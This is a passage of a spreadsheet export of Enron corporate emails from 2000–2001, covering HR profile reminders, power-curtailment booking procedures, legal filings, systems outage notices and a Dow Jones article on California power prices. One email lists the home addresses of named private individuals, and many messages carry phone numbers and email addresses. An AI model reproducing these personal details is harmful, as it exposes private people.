Cooper/HOU/ECT@ECT, Kay Chapman/HOU/ECT@ECT _x000D_
Subject: (Reminder) Update GIS Information_x000D_
_x000D_
This is a reminder !!!  If you haven't taken the time to update your GIS _x000D_
information, please do so.  It is essential that this function be performed _x000D_
as soon as possible. Please read the following memo sent to you a few days _x000D_
ago and if you have any questions regarding this request, please feel free to _x000D_
call Ted Bland @ 3-5275._x000D_
_x000D_
With Enron's rapid growth we need to maintain an ability to move employees _x000D_
between operating companies and new ventures.  To do this it is essential to _x000D_
have one process that will enable us to collect , update and retain employee _x000D_
data.  In the spirit of One Enron, and building on the success of the _x000D_
year-end Global VP/MD Performance Review Process, the  Enron VP/MD PRC _x000D_
requests that all Enron Vice Presidents and Managing Directors update their _x000D_
profiles. Current responsibilities, employment history, skills and education _x000D_
need to be completed  via the HR Global Information System.  HRGIS is _x000D_
accessible via the HRWEB home page on the intranet.  Just go to _x000D_
hrweb.enron.com and look for the HRGIS link.  Or just type eglobal.enron.com _x000D_
on the command line of your browser._x000D_
_x000D_
The target date by which to update these profiles is 7 July.  If you would _x000D_
like to have a hard copy of a template that could be filled out and returned _x000D_
for input, or If you need any assistance with the HRGIS application please _x000D_
contact Kathy Schultea at x33841.  _x000D_
_x000D_
Your  timely response to this request is greatly appreciated.   _x000D_
_x000D_
_x000D_
Thanks,_x000D_
_x000D_
_x000D_
Dave</t>
  </si>
  <si>
    <t>Fri, 13 Apr 2001 02:07:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>My schedule for April,May,June</t>
  </si>
  <si>
    <t>fyi_x000D_
----- Forwarded by Janine Migden/NA/Enron on 04/13/2001 09:07 AM -----_x000D_
_x000D_
	Barbara A Hueter_x000D_
	04/10/2001 03:47 PM_x000D_
		 _x000D_
		 To: Janine Migden/NA/Enron_x000D_
		 cc: _x000D_
		 Subject: My schedule for April,May,June_x000D_
_x000D_
_x000D_
	_x000D_
_x000D_
_x000D_
Janine, Here is my schedule_x000D_
_x000D_
April 16th through May 18th -- vacation/leave of absence_x000D_
May 21st - check in with you -- at that time if I have decided against making _x000D_
the change, we will begin to discuss reshaping my responsibilities.  _x000D_
Otherwise, we will proceed with the following._x000D_
May 21st through June 21st - work part-time with Friday's and part of _x000D_
Monday's in the office.  Tuesday, Wednesday, Thursday work from Cleveland. ( _x000D_
I would expect to be open to do some limited travel -- it would depend on the _x000D_
attendance policies of the professors) _x000D_
June 21st - sometime in July or August -- full-time in Columbus office._x000D_
_x000D_
Thanks!</t>
  </si>
  <si>
    <t>Thu, 17 May 2001 09:19:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'frank.vickers@enron.com', 'brian.redmond@enron.com', 'c.thompson@enron.com', 'rogers.herndon@enron.com', 'julie.gomez@enron.com', 'corry.bentley@enron.com', 'edward.baughman@enron.com', 'doug.gilbert-smith@enron.com', 'scott.neal@enron.com', 'lloyd.will@enron.com', 'fred.lagrasta@enron.com', 'berney.aucoin@enron.com', 'craig.breslau@enron.com', 'craig.fox@enron.com', 'laura.luce@enron.com', 'jean.mrha@enron.com', 'mark.davis@enron.com', 'ben.jacoby@enron.com', 'ed.mcmichael@enron.com', 'w.duran@enron.com', 'fletcher.sturm@enron.com', 'kevin.presto@enron.com', 'scott.josey@enron.com'})</t>
  </si>
  <si>
    <t>Technical and Commercial Support Performance Review Meeting Date</t>
  </si>
  <si>
    <t>Please Mark your calendar....._x000D_
  _x000D_
_x000D_
The ENA Gas and Power Technical and Commercial Support Performance Review _x000D_
Meeting will be tentatively held on June 21, 2001.  Details to follow.</t>
  </si>
  <si>
    <t>Wed, 13 Dec 2000 06:11:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'jeremy.morris@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'portland.shift@enron.com', 'd.hunsucker@enron.com'})</t>
  </si>
  <si>
    <t>PX HA cut on Sunday, 5/28</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Jeremy Morris/PDX/ECT on 12/13/2000 02:21 _x000D_
PM ---------------------------_x000D_
_x000D_
_x000D_
D Brett Hunsucker_x000D_
06/27/2000 04:52 PM_x000D_
To: Portland Shift, John M Forney/HOU/ECT@ECT, Chris Stokley/HOU/ECT_x000D_
cc:  _x000D_
_x000D_
Subject: PX HA cut on Sunday, 5/28_x000D_
_x000D_
Following is an email I sent a few weeks ago.  The parts in GREEN are new.  _x000D_
Please read this again to make sure you understand how PX cuts should be _x000D_
handled.  The reason for the change is we had Pete Davis adjust the _x000D_
Enpower-to-PX report to also include Enpower deals where the counterparty is _x000D_
CalPX-Time Removal._x000D_
_x000D_
If the PX calls to tell us of an hour-ahead cut, leave the prescheduled deals _x000D_
in Enpower alone.  In Enpower, enter a purchase from the Cal PX Time Removal _x000D_
for the curtailed mws @ the PXHA Index price, and a corresponding sale to the _x000D_
counterparty (in this case, EPE) for the same mws and @ the same index.  The _x000D_
index should be a negative price, so the above deal entries would show us _x000D_
ultimately paying the counterparty (selling @ a negative price) and receiving _x000D_
money from the PX (buying @ a negative price).  This is because we (in this _x000D_
case, "we" is ultimately EPE) are being paid for getting off of the curtailed _x000D_
line and relieving congestion.  The Enpower-to-PX report will show the DA/HA _x000D_
deal with the original volume plus the new PX Time Removal deal for the _x000D_
curtailed mws.  These two deals will NET to the actual flow for that hour.  _x000D_
The CAPS section of the report will show the ISO HA Final Schedules, which in _x000D_
this case is the actual mw flow.  This will result in no variance on the HA _x000D_
Enpower-to-PX report because the Enpower deals will tie to the PX schedules._x000D_
_x000D_
If the PX calls to tell us of a Real-Time cut, leave the prescheduled deals _x000D_
in Enpower alone.  In Enpower, enter a purchase from the Cal PX Time Removal _x000D_
for the curtailed mws @ the ISO Ex-Post Index price, and a corresponding sale _x000D_
to the counterparty for the same mws and @ the same index.  In this case, we _x000D_
are exposed to the ex-post price because the ISO is having to keep our supply _x000D_
whole to fill our load.  The Enpower-to-PX report will show the DA/HA deal _x000D_
with the original volume plus the new PX Time Removal deal for the curtailed _x000D_
mws.  These two deals will NET to the actual flow for that hour.  The CAPS _x000D_
section of the report will show the ISO HA Final Schedule, which in this case _x000D_
is not the actual mw flow.  Obviously, since Enpower nets to actual flow, and _x000D_
CAPS shows the HA Finals (which is not the actual flow volume), the _x000D_
Enpower-to-PX report will show a variance - which should be explained.  _x000D_
_x000D_
_x000D_
---------------------- Forwarded by D Brett Hunsucker/HOU/ECT on 06/27/2000 _x000D_
04:18 PM ---------------------------_x000D_
_x000D_
_x000D_
D Brett Hunsucker_x000D_
06/05/2000 04:28 PM_x000D_
To: John M Forney/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: PX HA cut on Sunday, 5/28_x000D_
_x000D_
don't loose it_x000D_
---------------------- Forwarded by D Brett Hunsucker/HOU/ECT on 06/05/2000 _x000D_
04:33 PM ---------------------------_x000D_
_x000D_
_x000D_
D Brett Hunsucker_x000D_
05/30/2000 12:07 PM_x000D_
To: John M Forney/HOU/ECT@ECT_x000D_
cc: Chris Stokley/HOU/ECT _x000D_
Subject: PX HA cut on Sunday, 5/28_x000D_
_x000D_
Hey.  Per our discussion w/Stokley:_x000D_
_x000D_
For the deals Holden entered (#345975 and 345976) on 5/28, I changed the _x000D_
volume from 50mw to 12.4 mw (the actual curtailment amt) and I changed the _x000D_
index from ISOSP15 (expost) to PXHA AZ2._x000D_
_x000D_
Here's what I think the procedure for cuts should be going forward:_x000D_
_x000D_
If the PX calls to tell us of an hour-ahead cut, leave the prescheduled deals _x000D_
in Enpower alone.  In Enpower, enter a purchase from the Cal PX Time Removal _x000D_
for the curtailed mws @ the PXHA Index price, and a corresponding sale to the _x000D_
counterparty (in this case, EPE) for the same mws and @ the same index.  The _x000D_
index should be a negative price, so the above deal entries would show us _x000D_
ultimately paying the counterparty (selling @ a negative price) and receiving _x000D_
money from the PX (buying @ a negative price).  This is because we (in this _x000D_
case, "we" is ultimately EPE) are being paid for getting off of the curtailed _x000D_
line and relieving congestion.  This will result in an explained variance on _x000D_
the HA Enpower-to-PX report because the Enpower deal will still show the DA _x000D_
volume, while the PX HA Final Schedules will show the curtailed volume.  This _x000D_
variance should be noted on the report that's left on my desk._x000D_
_x000D_
If the PX calls to tell us of a Real-Time cut, leave the prescheduled deals _x000D_
in Enpower alone.  In Enpower, enter a purchase from the Cal PX Time Removal _x000D_
for the curtailed mws @ the ISO Ex-Post Index price, and a corresponding sale _x000D_
to the counterparty for the same mws and @ the same index.  In this case, we _x000D_
are exposed to the ex-post price because the ISO is having to keep our supply _x000D_
whole to fill our load.  There will be no variance shown on the Enpower-to-PX _x000D_
report because both Enpower and the PX HA Final Schedules will show the DA _x000D_
volume.  What I need from RT in this case is to note on the report the hour _x000D_
and amount of the real-time cut.  _x000D_
_x000D_
Let me know if you have any questions._x000D_
_x000D_
Brett_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 8 Feb 2001 10:35:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'stewart.rosman@enron.com'})</t>
  </si>
  <si>
    <t>Re: Status of Shari Stack's Move to Portland</t>
  </si>
  <si>
    <t>Still working on it - I'll let you know final results soon</t>
  </si>
  <si>
    <t>Mon, 16 Jul 2001 05:36:14 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'mike.macphee@enron.com'})</t>
  </si>
  <si>
    <t>RE: Planned PLant Outages</t>
  </si>
  <si>
    <t xml:space="preserve">NO_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Macphee, Mike  _x000D_
Sent:	Sunday, July 15, 2001 6:57 PM_x000D_
To:	Zufferli, John_x000D_
Subject:	Planned PLant Outages_x000D_
_x000D_
_x000D_
_x000D_
Hi John,_x000D_
_x000D_
With reference to Article 5, section 5.1 (b), are we going to propose an alternative planned outage to TAU for next year?  _x000D_
_x000D_
Thanks,_x000D_
Mike_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 12 Dec 2000 00:51:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'bouthonnet.michel@wanadoo.fr', 'hbm@wanadoo.fr'})</t>
  </si>
  <si>
    <t>Interfert</t>
  </si>
  <si>
    <t>Michel,_x000D_
_x000D_
I have your urgent message below.  This is the first that I have heard that _x000D_
you needed two originals to file.  Luckily, I have an extra set of originals, _x000D_
which I will tonight give to Federal Express to courier to Bernard's office, _x000D_
assuming that the jets are flying despite the freezing weather/sleet that is _x000D_
expected in Houston tonight.  If the jets are flying, I assume that Bernard _x000D_
will get the originals by Thursday._x000D_
_x000D_
I would appreciate Bernard's office advising me by the close of business in _x000D_
Paris Thursday whether they have received this package._x000D_
_x000D_
Parenthetically, I repeat my two prior requests that I be advised as soon as _x000D_
possible what qualifications are necessary for a liquidator, so that we can _x000D_
speedily substitute someone in and for the place of John Echols, who has _x000D_
signed the originals we are now using only with my promise that we would _x000D_
speedily find a substitute.  Based on Bernard's advice, I told Echols that _x000D_
this could be done within 60 days.  Echols signed the documents on December _x000D_
5.  I accordingly anticipate that you and Bernard will be working with me to _x000D_
get the substitution accomplished by no later than Monday, February 5, 2001.  _x000D_
I have made myself personally responsible to my clients that this will be _x000D_
accomplished timely.  _x000D_
_x000D_
Britt_x000D_
_x000D_
_x000D_
_x000D_
----- Forwarded by Britt Davis/Corp/Enron on 12/12/2000 08:33 AM -----_x000D_
_x000D_
	"bouthonnet.michel" &lt;bouthonnet.michel@wanadoo.fr&gt;_x000D_
	12/12/2000 04:27 AM_x000D_
	Please respond to "bouthonnet.michel"_x000D_
		 _x000D_
		 To: &lt;Britt.Davis@enron.com&gt;_x000D_
		 cc: _x000D_
		 Subject: VERY URGENT_x000D_
_x000D_
_x000D_
_x000D_
TO BRITT  DAVIS_x000D_
?_x000D_
?_x000D_
??????? Dear BRITT,_x000D_
?_x000D_
?_x000D_
??????? Bernard gave me only one copy  of the documents I sent you about the _x000D_
renewal of John Echols as liquidator of  EGLE._x000D_
?_x000D_
??????? The  court of  commerce needs two copies. It is of the utmost _x000D_
importance to get at least  another copy duly signed of :_x000D_
?_x000D_
??????? - Liquidator  report_x000D_
??????? - General meeting dated  december 4/2000._x000D_
?_x000D_
??????? Do not hesitate to call me if  necessary._x000D_
?_x000D_
???????  Best Regards._x000D_
?_x000D_
?_x000D_
?_x000D_
???????????????????????????????????????????????????????????????????????  _x000D_
Michel BOUTHONNET</t>
  </si>
  <si>
    <t>Mon, 24 Sep 2001 12:29:42 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'lcampbel@enron.com', 'dsalina@enron.com'})</t>
  </si>
  <si>
    <t>Alert Posted: 3:25 PM Monday, September 24, 2001: GOS	Scheduled_x000D_
 Maintenance</t>
  </si>
  <si>
    <t xml:space="preserve">Alert Posted: 3:25 PM Monday, September 24, 2001: GOS Scheduled Maintenance_x000D_
GOS will be down on Monday, September 24, 2001 from 11:00 p.m. until 2:30 a.m. on Tuesday, September 25, 2001 for scheduled maintenance._x000D_
 We apologize for any inconvenience that this may cause.  Thank you._x000D_
</t>
  </si>
  <si>
    <t>Mon, 31 Jul 2000 06:12:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'phillip.allen@enron.com', 'mike.grigsby@enron.com'})</t>
  </si>
  <si>
    <t>TW Options customer info</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Jane M Tholt/HOU/ECT on 07/31/2000 01:09 _x000D_
PM ---------------------------_x000D_
   _x000D_
	Enron North America Corp._x000D_
	_x000D_
	From:  TK Lohman @ ENRON                           07/31/2000 12:46 PM_x000D_
	_x000D_
_x000D_
To: jane.m.tholt@enron.com_x000D_
cc:  _x000D_
Subject: TW Options customer info_x000D_
_x000D_
Let me know if you have any questions or concerns about this filing.  TW _x000D_
plans on filing this with FERC around the end of August. _x000D_
_x000D_
Thanks,_x000D_
_x000D_
TK_x000D_
---------------------- Forwarded by TK Lohman/ET&amp;S/Enron on 07/31/2000 12:46 _x000D_
PM ---------------------------_x000D_
   _x000D_
	_x000D_
	_x000D_
	From:  Susan Scott                           07/26/2000 10:38 AM_x000D_
	_x000D_
_x000D_
To: Jeffery Fawcett/ET&amp;S/Enron@ENRON, Kevin Hyatt/ET&amp;S/Enron@Enron, Lorraine _x000D_
Lindberg/ET&amp;S/Enron@ENRON, TK Lohman/ET&amp;S/Enron@ENRON, Michelle _x000D_
Lokay/ET&amp;S/Enron@Enron, Christine Stokes/ET&amp;S/Enron@ENRON_x000D_
cc: Steven Harris/ET&amp;S/Enron@ENRON _x000D_
_x000D_
Subject: TW Options customer info_x000D_
_x000D_
Here is the revised bullet sheet along with the draft agreement._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 30 Mar 2001 13:16:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'jeff.pearson@enron.com'})</t>
  </si>
  <si>
    <t>Presentation for McKay</t>
  </si>
  <si>
    <t xml:space="preserve">I have updated the forecast to reflect TCPL delays until Nov 1._x000D_
_x000D_
   </t>
  </si>
  <si>
    <t>Tue, 21 Mar 2000 05:32:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'brian.heinrich@enron.com'})</t>
  </si>
  <si>
    <t>Help!</t>
  </si>
  <si>
    <t>Brian, _x000D_
_x000D_
Who do I talk to about getting Daren Farmer a Labor Distribution report. He _x000D_
needs to see what employees are hitting his RC.  I know that we have _x000D_
discussed this prior and soem Managers are receiving a monthly report but he _x000D_
is not.  Who can help us???_x000D_
_x000D_
Thank you!_x000D_
Yvette_x000D_
x3.5953</t>
  </si>
  <si>
    <t>Wed, 20 Sep 2000 07:41:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'mcox@nam.org'})</t>
  </si>
  <si>
    <t>NAM - Fortune Survey - Third Quarter</t>
  </si>
  <si>
    <t xml:space="preserve">Attention NAM member:_x000D_
_x000D_
Your company has been selected to participate in the quarterly NAM/FORTUNE_x000D_
Manufacturing Index on-line survey._x000D_
_x000D_
The NAM/Fortune Manufacturing Index has appeared in FORTUNE's Industrial_x000D_
Management and Technology edition since 1997._x000D_
_x000D_
Below is a link to the on-line survey covering the third quarter of 2000._x000D_
Four times a year, your company's response will be tallied with other NAM_x000D_
members and published in FORTUNE's Industrial Management and Technology_x000D_
edition.  Completing the survey is as easy as 1, 2, 3. (1) Click on the link_x000D_
below.  (2)    Fill out the short survey and (3) Click the submit button at_x000D_
the end of the survey._x000D_
 http://www.nam.org/ECO/Fortune/forlg.htm_x000D_
&lt;http://www.nam.org/ECO/Fortune/forlg.htm&gt;   (Please fill out this survey by_x000D_
September 27th)_x000D_
_x000D_
In addition to being featured quarterly in FORTUNE Magazine, you can look at_x000D_
previous survey results on NAM's internet homepage at_x000D_
http://www.nam.org/ECO/Fortune/index.html_x000D_
&lt;http://www.nam.org/ECO/Fortune/index.html&gt;_x000D_
_x000D_
Thank you in advance for helping us at the NAM better serve your interests._x000D_
_x000D_
If you have any questions, please contact Dave Huether at dhuether@nam.org_x000D_
&lt;mailto:dhuether@nam.org&gt;_x000D_
_x000D_
**Unable to click on the links?**_x000D_
Sometimes links are broken when they are transmitted via e-mail or if your_x000D_
e-mail program does not support hyperlinks. When this happens we suggest you_x000D_
copy and paste the URL into your browser. This way you can get the whole_x000D_
link as sometimes it carries over onto the next line. When you do this, make_x000D_
sure there are no spaces in the link._x000D_
</t>
  </si>
  <si>
    <t>Mon, 19 Nov 2001 05:21:21 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'dave.perrino@enron.com', 'steve.walton@enron.com', 'ray.alvarez@enron.com'})</t>
  </si>
  <si>
    <t>RE: WSCC BOT Meeting announcement - Dec 5-6 Phoenix</t>
  </si>
  <si>
    <t xml:space="preserve">Before we take this on, let's talk about how it fits into our priorities.  What will be happening that we must cover?_x000D_
_x000D_
Jim_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Perrino, Dave  _x000D_
Sent:	Saturday, November 17, 2001 12:29 AM_x000D_
To:	Alvarez, Ray; Walton, Steve; Steffes, James D._x000D_
Subject:	RE: WSCC BOT Meeting announcement - Dec 5-6 Phoenix_x000D_
_x000D_
Ray,_x000D_
_x000D_
I will be happy to attend the WSCC BOT meeting in December.  I spoke to Steve about the issues to be covered, so we should be all set.  I will contact WSCC and register next week._x000D_
_x000D_
Kind Regards,_x000D_
_x000D_
Dave_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Alvarez, Ray  _x000D_
Sent:	Friday, November 16, 2001 11:45 AM_x000D_
To:	Perrino, Dave; Walton, Steve; Steffes, James D._x000D_
Subject:	RE: WSCC BOT Meeting announcement - Dec 5-6 Phoenix_x000D_
_x000D_
Dave, Steve and I talked and due to our schedules and distance from Phoenix, we think it would be most effective if you could represent the company at this BOT meeting.  This is assuming your schedule allows and Jim is on board with one of us attending.  It will be an important meeting with approval of WECC and next year's budget on the agenda.  I am making hotel reservations for you, since today is the deadline.  I think you also need to fill out a form for WSCC; Jenny Remington is the meeting planner.  I will send Dennis Eyre a delegation after I hear from you and Jim.  Ray_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Perrino, Dave  _x000D_
Sent:	Thursday, November 15, 2001 12:20 PM_x000D_
To:	Alvarez, Ray; Walton, Steve_x000D_
Subject:	WSCC BOT Meeting announcement - Dec 5-6 Phoenix_x000D_
_x000D_
FYI_x000D_
_x000D_
 &lt;&lt; File: DEC 2001 ANNOUNCE.doc &gt;&gt; </t>
  </si>
  <si>
    <t>Fri, 26 Oct 2001 09:00:39 -0700 (PDT)</t>
  </si>
  <si>
    <t>Names for the shower</t>
  </si>
  <si>
    <t>Rick &amp; Laura Figueroa_x000D_
210 Windrift Ct._x000D_
Sugarland, TX 77479_x000D_
_x000D_
Brian &amp; Amy Brewer_x000D_
11927 Canyon Mills Dr._x000D_
Houston, TX 77095_x000D_
_x000D_
Carrie Grin_x000D_
3502 Burlington St #3_x000D_
Houston, TX 77006_x000D_
_x000D_
Mik Cadena_x000D_
5610 Island Breeze_x000D_
Houston, TX 77041_x000D_
_x000D_
Can't wait to see you guys.  Sorry if I sounded scatter brained when we talked on Wed, I was trying to watch the gas screen and trade at the same time._x000D_
_x000D_
Hope all is well._x000D_
_x000D_
John</t>
  </si>
  <si>
    <t>Wed, 16 Aug 2000 06:35:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'andrew.champion@enron.com'})</t>
  </si>
  <si>
    <t>Re: O</t>
  </si>
  <si>
    <t>Andrew,_x000D_
Vince and Grant from Research would like to have RiskTrack on their PCs._x000D_
Can you install it for them?_x000D_
_x000D_
Appreciate it,_x000D_
_x000D_
Tanya.</t>
  </si>
  <si>
    <t>Fri, 27 Apr 2001 21:36:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'chris.stokley@enron.com', 'johnson.donna@enron.com'})</t>
  </si>
  <si>
    <t>Status of Deviation Actualizations - October Preliminaries</t>
  </si>
  <si>
    <t>I have started the actualization process with 403 Load Deviation, and need to work closely with TJ on Monday to find out why the allocations don't match the variances.  I have isolated one day, zone and hour and will work on that with him.  We have got to get it working properly, or else there will be a lot of manual work required._x000D_
_x000D_
404 Export Deviation is complete for October, and the records can be set to A with the other days as normal.  _x000D_
_x000D_
405 Import Deviation needs the new calcs that will be provided by a re-run of SettleSupplemental, which I am going to kick off just before I leave.  I will run that on Monday while TJ is researching the 403 errors/problems._x000D_
_x000D_
402 Gen Deviation will also be started on Monday._x000D_
_x000D_
Tentative target date for completion of Prelim's is next Thursday, and Finals on Friday._x000D_
_x000D_
See you Monday._x000D_
_x000D_
Caroline</t>
  </si>
  <si>
    <t>Mon, 16 Apr 2001 02:16:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'jaesoo.lew@enron.com'})</t>
  </si>
  <si>
    <t>Re: clustering for power</t>
  </si>
  <si>
    <t>Jaesoo,_x000D_
as we discussed last week on Wednesday meeting can you, please,_x000D_
implement clustering for power curves by geographical region. This involves _x000D_
the following:_x000D_
_x000D_
1. Deciding together with Risk Control how many geographical regions we want _x000D_
to use_x000D_
and which Enron's curves belong to each region._x000D_
2. Deciding together with Risk Control how to choose core curves for each _x000D_
region. This decision can _x000D_
be maid based on the a) position size; b) statistical analysis. There might _x000D_
be other considerations._x000D_
3. Doing regression analysis for each curve versus the corresponding core _x000D_
curve._x000D_
_x000D_
Winston,_x000D_
can is it possible to run VAR for the clustering results obtained by Jaesoo _x000D_
with clustering done by SAS?_x000D_
Should we wait for the stage re-fresh and what is the status on this? _x000D_
_x000D_
Tanya.</t>
  </si>
  <si>
    <t>Thu, 27 Dec 2001 13:06:50 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'steve.van@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'jspiers@aklp.com'})</t>
  </si>
  <si>
    <t>Motion To Reject Gas Transportation Contracts</t>
  </si>
  <si>
    <t xml:space="preserve">Jeff,_x000D_
_x000D_
I am an Enron Wholesale Services attorney who is advising on ENA gas transportation matters.  Elizabeth Sager suggested that I contact you about assisting me with the preparation of a Motion to Reject the bulk of the executory transportation service agreements that ENA has with interstate pipeline companies.  _x000D_
_x000D_
The attached spreadsheet summarizes the terms of said transportation agreements; please note that the first sheet of the spreadsheet file describes the 5 transportation contracts that ENA wishes to assume; the remainer are out of the money transportation and storage arrangements that ENA desires to reject.  Please review the attached and let me know if it contains sufficient information with which to proceed with the preparation of the Motion.  _x000D_
_x000D_
I imagine you will have plenty of questions. . . . I myself have a number of questions regarding the agency relationships shown on the spreadsheet, as well as ENA's right or need to reject those Service Agreements under which ENA has heretofore released pipeline capacity to third parties.  _x000D_
_x000D_
I look forward to speaking with you about these matters as well as determing the timeframe for rejecting these contracts.  _x000D_
_x000D_
_x000D_
Steve Van Hooser_x000D_
Enron North America Corp._x000D_
713-853-7238(o)_x000D_
713-582-6413(c)_x000D_
713-646-3490 (fax)_x000D_
_x000D_
 </t>
  </si>
  <si>
    <t>Fri, 27 Apr 2001 14:42:10 -0700 (PDT)</t>
  </si>
  <si>
    <t>SUPPLEMENTAL Weekend Outage Report for 4-27-01 through 4-30-01</t>
  </si>
  <si>
    <t>_x000D_
------------------------------------------------------------------------------------------------------_x000D_
W E E K E N D   S Y S T E M S   A V A I L A B I L I T Y_x000D_
_x000D_
F O R_x000D_
_x000D_
April 27, 2001 5:00pm through April 30,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ALSO SEE ORIGINAL REPORT _x000D_
Impact:  CORP_x000D_
Time:  Fri 4/27/2001 at  6:00:00 PM CT thru Fri 4/27/2001 at  8:00:00 PM CT_x000D_
	Fri 4/27/2001 at  4:00:00 PM PT thru Fri 4/27/2001 at  6:00:00 PM PT_x000D_
	Sat 4/28/2001 at 12:00:00 AM London thru Sat 4/28/2001 at  2:00:00 AM London_x000D_
Outage:  ClearCase Patch_x000D_
Environments Impacted:  Corp_x000D_
Purpose: This patch will resolve several issues involving the MVFS (ClearCase file system.)_x000D_
Backout: Remove the patch_x000D_
Contact(s): 	Troy Beyer  713.345.8316  713.406.1782_x000D_
 _x000D_
SITARA:  No Scheduled Outages._x000D_
_x000D_
SUN/OSS SYSTEM: No Scheduled Outages._x000D_
_x000D_
TELEPHONY: _x000D_
Impact:  _x000D_
Time:  Sat 4/28/2001 at  9:00:00 AM CT thru Sat 4/28/2001 at  11:00:00 AM CT_x000D_
	Sat 4/28/2001 at  7:00:00 AM PT thru Sat 4/28/2001 at    9:00:00 AM PT_x000D_
	Sat 4/28/2001 at  3:00:00 PM London  thru Sat 4/28/2001 at  5:00:00 PM London_x000D_
Outage:  ISDN Calling Name and Number _x000D_
Environments Impacted:  All_x000D_
Purpose: To allow for number and name to appear on telephone displays.  If testing is successful, _x000D_
permanent changes will be put into effect at a later date.  These will not be service affecting._x000D_
Backout: Unbusy trunk group._x000D_
Contact(s): 	Cynthia Siniard       713-853-0558_x000D_
		Harold Williams      713-345-8917 _x000D_
   _x000D_
TERMINAL SERVER:  No Scheduled Outages._x000D_
_x000D_
UNIFY:        SEE ORIGINAL REPORT  _x000D_
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Mon, 9 Oct 2000 02:22:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'liz@luntz.com', 'jennifer.rudolph@enron.com', 'mike.dahlke@enron.com', "nicholas.o'day@enron.com", 'filuntz@aol.com', 'john.thompson@enron.com'})</t>
  </si>
  <si>
    <t>CalPX:High Summer Pwr Prices Mostly From Fundamentals</t>
  </si>
  <si>
    <t>CalPX:High Summer Pwr Prices Mostly From Fundamentals_x000D_
By Mark Golden_x000D_
  _x000D_
10/04/2000 _x000D_
Dow Jones Energy Service _x000D_
(Copyright (c) 2000, Dow Jones &amp; Company, Inc.) _x000D_
NEW YORK -(Dow Jones)- High electricity prices this summer in California were _x000D_
the result of market fundamentals and structure, rather than market _x000D_
manipulation by particular participants, according to a preliminary report by _x000D_
the California Power Exchange. _x000D_
Rising demand in the state and in the western U.S. overall combined with a _x000D_
lack of new generators to push wholesale prices to levels about three times _x000D_
as high as prices last summer, according to the preliminary report obtained _x000D_
by Dow Jones Newswires. _x000D_
And the price rise was predictable, according to the report. _x000D_
Citing hot weather from May to July in California and the Southwest, lower _x000D_
hydroelectric supplies in the Northwest, higher natural gas prices, higher _x000D_
prices for nitrogen oxide emission allowances, the report says that "reserve _x000D_
margins during peak hours in May and June in the Western Systems Coordinating _x000D_
Council region dropped to a thin 4% to 6%, compared to the forecast 17% to _x000D_
20%." _x000D_
"Price movements in California and the WSCC are consistent with analysis by _x000D_
Cambridge Energy Research Associates, which has demonstrated a high _x000D_
correlation between low capacity reserve margins and high spot prices in _x000D_
other regions of the U.S.," the report says. _x000D_
While the CalPX recommends changes to its market rules, it says that prices _x000D_
were sometimes higher in other parts of the western U.S. than in California _x000D_
this summer, further evidence of a genuine market imbalance between supply _x000D_
and demand. _x000D_
The CalPX market flaws, however, "provided incentives to suppliers to _x000D_
speculate on receiving higher prices in the Real-Time and Ancillary Services _x000D_
markets (which are operated by the California Independent System Operator) by _x000D_
moving their supply to those markets, leaving less supply in the CalPX _x000D_
Day-Ahead market. These design flaws need to be addressed," the report says. _x000D_
Although suppliers had incentives to move power to the highest-priced _x000D_
markets, the CalPX found no "consistent pattern by individual participants or _x000D_
participant category. As a result, it is difficult to single out any one _x000D_
group as the force driving prices." _x000D_
CalPX will send the final report to various bodies investigating the _x000D_
California wholesale electricity market, including the Federal Energy _x000D_
Regulatory Commission, the California Public Utilities Commission, the _x000D_
California Attorney General, the California Electricity Oversight Board and _x000D_
the state legislature. _x000D_
Its findings may not sit well politically with some of those bodies, _x000D_
according to one source. California utilities, Gov. Gray Davis, and various _x000D_
legislators and regulators have been blaming independent power generators - _x000D_
"out-of-state" companies that bought big generating stations from the _x000D_
utilities over the past three years - for market manipulation and price _x000D_
gouging. Those groups hope to build a case with the FERC that would force _x000D_
suppliers to refund some of their big gains this summer back to California's _x000D_
utilities and to the customers in the San Diego area, who have received high _x000D_
electric bills. _x000D_
Instead, the CalPX's preliminary report proposes corrections that are _x000D_
relatively modest, such as increasing demand responsiveness, removing _x000D_
barriers to new generation, proportionally allocating out-of-market purchase _x000D_
costs to the utilities that underscheduled power purchases and encouraging _x000D_
utilities to buy more power in the forward market. _x000D_
As ordered by state legislation to deregulate the electric utility industry _x000D_
in California, the regulated utility units of PG&amp;E Corp (PCG), Edison _x000D_
International (EIX) and Sempra Energy (SRE) purchase the power they need one _x000D_
day in advance through the CalPX and make any last-minute purchases through _x000D_
the California ISO. _x000D_
   By Mark Golden, Dow Jones Newswires _x000D_
   201-938-4604; mark.golden@dowjones.com</t>
  </si>
  <si>
    <t>Wed, 24 Oct 2001 12:46:18 -0700 (PDT)</t>
  </si>
  <si>
